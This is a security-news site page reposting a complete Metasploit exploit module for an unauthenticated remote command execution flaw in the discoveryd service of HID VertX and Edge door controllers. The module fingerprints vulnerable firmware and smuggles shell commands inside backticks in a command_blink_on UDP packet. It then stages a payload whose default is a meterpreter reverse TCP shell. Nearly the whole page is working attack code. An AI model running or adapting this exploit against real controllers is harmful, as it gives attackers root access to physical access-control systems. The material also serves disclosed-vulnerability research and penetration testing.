首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
HID discoveryd command_blink_on Unauthenticated Remote Command Execution
来源:metasploit.com 作者:Coles 发布时间:2018-07-09  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'HID discoveryd command_blink_on Unauthenticated RCE',
      'Description' => %q{
        This module exploits an unauthenticated remote command execution
        vulnerability in the discoveryd service exposed by HID VertX and Edge
        door controllers.

        This module was tested successfully on a HID Edge model EH400
        with firmware version 2.3.1.603 (Build 04/23/2012).
      },
      'Author'      =>
        [
          'Ricky "HeadlessZeke" Lawshae', # Discovery
          'coldfusion39', # VertXploit
          'Brendan Coles' # Metasploit
        ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'linux',
      'Arch'        => ARCH_ARMLE,
      'Privileged'  => true,
      'References'  =>
        [
          ['ZDI', '16-223'],
          ['URL', 'https://blog.trendmicro.com/let-get-door-remote-root-vulnerability-hid-door-controllers/'],
          ['URL', 'http://nosedookie.blogspot.com/2011/07/identifying-and-querying-hid-vertx.html'],
          ['URL', 'https://exfil.co/2016/05/09/exploring-the-hid-eh400/'],
          ['URL', 'https://github.com/lixmk/Concierge'],
          ['URL', 'https://github.com/coldfusion39/VertXploit']
        ],
      'DisclosureDate'  => 'Mar 28 2016',
      'DefaultOptions'  =>
        {
          'WfsDelay'          => 30,
          'PAYLOAD'           => 'linux/armle/meterpreter/reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'echo'
        },
      'Targets'         => [['Automatic', {}]],
      'CmdStagerFlavor' => 'echo', # wget is available, however the wget command is too long
      'DefaultTarget'   => 0))
    register_options [ Opt::RPORT(4070) ]
  end

  def check
    connect_udp
    udp_sock.put 'discover;013;'
    res = udp_sock.get(5)
    disconnect_udp

    if res.to_s.eql? ''
      vprint_error 'Connection failed'
      return CheckCode::Unknown
    end

    hid_res = parse_discovered_response res
    if hid_res[:mac].eql? ''
      vprint_error 'Malformed response'
      return CheckCode::Safe
    end

    @mac = hid_res[:mac]

    vprint_good "#{rhost}:#{rport} - HID discoveryd service detected"
    vprint_line hid_res.to_s
    report_service(
      host: rhost,
      mac: hid_res[:mac],
      port: rport,
      proto: 'udp',
      name: 'hid-discoveryd',
      info: hid_res
    )

    if hid_res[:version].to_s.eql? ''
      vprint_error "#{rhost}:#{rport} - Could not determine device version"
      return CheckCode::Detected
    end

    # Vulnerable version mappings from VertXploit
    vuln = false
    version = Gem::Version.new(hid_res[:version].to_s)
    case hid_res[:model]
    when 'E400'     # EDGEPlus
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'EH400'    # EDGE EVO
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'EHS400'   # EDGE EVO Solo
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'ES400'    # EDGEPlus Solo
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'V2-V1000' # VertX EVO
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'V2-V2000' # VertX EVO
      vuln = true if version <= Gem::Version.new('3.5.1.1483')
    when 'V1000'    # VertX Legacy
      vuln = true if version <= Gem::Version.new('2.2.7.568')
    when 'V2000'    # VertX Legacy
      vuln = true if version <= Gem::Version.new('2.2.7.568')
    else
      vprint_error "#{rhost}:#{rport} - Device model was not recognized"
      return CheckCode::Detected
    end

    vuln ? CheckCode::Appears : CheckCode::Safe
  end

  def send_command(cmd)
    connect_udp

    # double escaping for echo -ne stager
    encoded_cmd = cmd.gsub("\\", "\\\\\\")

    # packet length (max 44)
    len = '044'

    # <num> of times to blink LED, if the device has a LED; else
    # <num> second to beep (very loudly) if the device does not have a LED
    num = -1 # no beep/blink ;)

    # construct packet
    req = ''
    req << 'command_blink_on;'
    req << "#{len};"
    req << "#{@mac};"
    req << "#{num}`#{encoded_cmd}`;"

    # send packet
    udp_sock.put req
    res = udp_sock.get(5)
    disconnect_udp

    unless res.to_s.start_with? 'ack;'
      fail_with Failure::UnexpectedReply, 'Malformed response'
    end
  end

  def execute_command(cmd, opts)
    # the protocol uses ';' as a separator,
    # so we issue each system command separately.
    # we're using the echo command stager which hex encodes the payload,
    # so there's no risk of replacing any ';' characters in the payload data.
    cmd.split(';').each do |c|
      send_command c
    end
  end

  def exploit
    print_status "#{rhost}:#{rport} - Connecting to target"

    check_code = check
    unless check_code == CheckCode::Appears || check_code == CheckCode::Detected
      fail_with Failure::Unknown, "#{rhost}:#{rport} - Target is not vulnerable"
    end

    # linemax is closer to 40,
    # however we need to account for additinal double escaping
    execute_cmdstager linemax: 30, :temp => '/tmp'
  end

  def parse_discovered_response(res)
    info = {}

    return unless res.start_with? 'discovered'

    hid_res = res.split(';')
    return unless hid_res.size == 9
    return unless hid_res[0] == 'discovered'
    return unless hid_res[1].to_i == res.length

    {
      :mac          => hid_res[2],
      :name         => hid_res[3],
      :ip           => hid_res[4],
      # ?           => hid_res[5], # '1'
      :model        => hid_res[6],
      :version      => hid_res[7],
      :version_date => hid_res[8]
    }
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·GitList 0.6.0 Argument Injecti
·HP VAN SDN Controller Root Com
·ManageEngine Exchange Reporter
·Boxoft WAV To MP3 Converter 1.
·openslp 2.0.0 Double Free
·ntop-ng Authentication Bypass
·Delta Industrial Automation CO
·Nagios XI 5.2.6-5.4.12 - Chain
·FTPShell Client 6.70 (Enterpri
·SIPp 3.6 - Local Buffer Overfl
·Enhanced Mitigation Experience
·VMware NSX SD-WAN Edge < 3.1.2
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved